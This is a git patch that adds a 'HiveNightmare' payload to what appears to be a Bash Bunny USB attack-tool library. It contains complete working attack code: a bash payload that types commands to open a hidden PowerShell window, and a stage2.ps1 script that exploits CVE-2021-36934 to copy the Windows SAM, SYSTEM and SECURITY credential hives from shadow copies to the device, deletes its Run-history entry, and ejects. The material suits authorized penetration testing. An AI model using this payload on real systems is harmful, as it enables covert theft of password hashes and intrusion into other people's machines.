From 605b7f1cab6e16223ada4d8feaeadeaf0ba966cc Mon Sep 17 00:00:00 2001 From: 9o3 <33983569+9o3@users.noreply.github.com> Date: Tue, 24 Aug 2021 21:30:47 +0200 Subject: [PATCH] New payload: HiveNightmare (#462) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Leverages CVE-2021–36934 to get SAM/SYSTEM/SECURITY hives. --- .../exfiltration/HiveNightmare/README.md | 7 +++ .../exfiltration/HiveNightmare/payload.txt | 48 +++++++++++++++++++ .../exfiltration/HiveNightmare/stage2.ps1 | 26 ++++++++++ 3 files changed, 81 insertions(+) create mode 100644 payloads/library/exfiltration/HiveNightmare/README.md create mode 100644 payloads/library/exfiltration/HiveNightmare/payload.txt create mode 100644 payloads/library/exfiltration/HiveNightmare/stage2.ps1 diff --git a/payloads/library/exfiltration/HiveNightmare/README.md b/payloads/library/exfiltration/HiveNightmare/README.md new file mode 100644 index 00000000..d0e732db --- /dev/null +++ b/payloads/library/exfiltration/HiveNightmare/README.md @@ -0,0 +1,7 @@ +# HiveNightmare + +Leverages CVE-2021–36934 to get SAM/SYSTEM/SECURITY hives. + +## Options +### TRIES +> The amount of shadowcopies to search for the SAM/SYSTEM/SECURITY hives. diff --git a/payloads/library/exfiltration/HiveNightmare/payload.txt b/payloads/library/exfiltration/HiveNightmare/payload.txt new file mode 100644 index 00000000..8e726d08 --- /dev/null +++ b/payloads/library/exfiltration/HiveNightmare/payload.txt @@ -0,0 +1,48 @@ +#!/bin/bash +# +# Title: HiveNightmare +# Description: Leverages CVE-2021–36934 to get SAM/SYSTEM/SECURITY hives. +# Author: 9o3 +# Twitter: @BugBot4 +# Version: 1.0 +# Category: Exfiltration +# Attackmodes: HID, Storage +# +# LED STATUS +# ========== +# SETUP.......Create stage file and loot folder +# ATTACK......Run hidden PowerShell window that gets SAM/SYSTEM/SECURITY hives using shadow copies (CVE-2021-36934) +# CLEANUP.....Remove generated files +# FINISH......Finished +# +# OPTIONS +# ======= +# TRIES => Number of shadow copies to try to find SAM/SYSTEM/SECURITY hives in. +TRIES=10 + +######## Create stage file and loot folder ######## +# Alter second stage based on settings & create loot folder if it does not yet exist. Removes previous DONE file if present. +LED SETUP +GET SWITCH_POSITION +cd /root/udisk/payloads/$SWITCH_POSITION +sed -e "s/<#TR#>/$TRIES/g" stage2.ps1 > 2 +mkdir -p /root/udisk/loot/HiveNightmare +rm /root/udisk/DONE +ATTACKMODE HID STORAGE + +######## Run hidden PowerShell window ######## +# Run hidden PowerShell window which executes the content of the stage2.ps1 file. +LED ATTACK +RUN WIN "powershell -w 1 -NoP iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\2')-Raw)" +until [ -f /root/udisk/DONE ] +do + sleep 0.2 +done + +######## Remove generated files ######## +# Removes the generated files and sync file system +LED CLEANUP +rm 2 +rm /root/udisk/DONE +sync +LED FINISH \ No newline at end of file diff --git a/payloads/library/exfiltration/HiveNightmare/stage2.ps1 b/payloads/library/exfiltration/HiveNightmare/stage2.ps1 new file mode 100644 index 00000000..2604130a --- /dev/null +++ b/payloads/library/exfiltration/HiveNightmare/stage2.ps1 @@ -0,0 +1,26 @@ +#Remove latest run entry +$p = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"; $m = "MRUList"; $l=gpv $p $m; rp $p $l[0]; sp $p $m $l.Substring(1); + +#Set variables and create loot folder +$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name; +$loot = $bb+"loot\HiveNightmare\"; +$usr = (whoami) -replace "\\","_"; +New-Item -ItemType Directory -Force -Path $loot$usr; + +$i = 0; +$found = $FALSE; +while($i -lt <#TR#>) { + try { + [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy"+$i+"\Windows\System32\config\SAM",$loot+$usr+"\SAM"); + $found = $TRUE; + break; + } catch {$i++} +} +if($found){ + [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy"+$i+"\Windows\System32\config\SYSTEM",$loot+$usr+"\SYSTEM"); + [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy"+$i+"\Windows\System32\config\SECURITY",$loot+$usr+"\SECURITY"); +} + +#Let the Bash Bunny know we're done here & Eject. +New-Item -ItemType file $bb"DONE"; +(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject"); \ No newline at end of file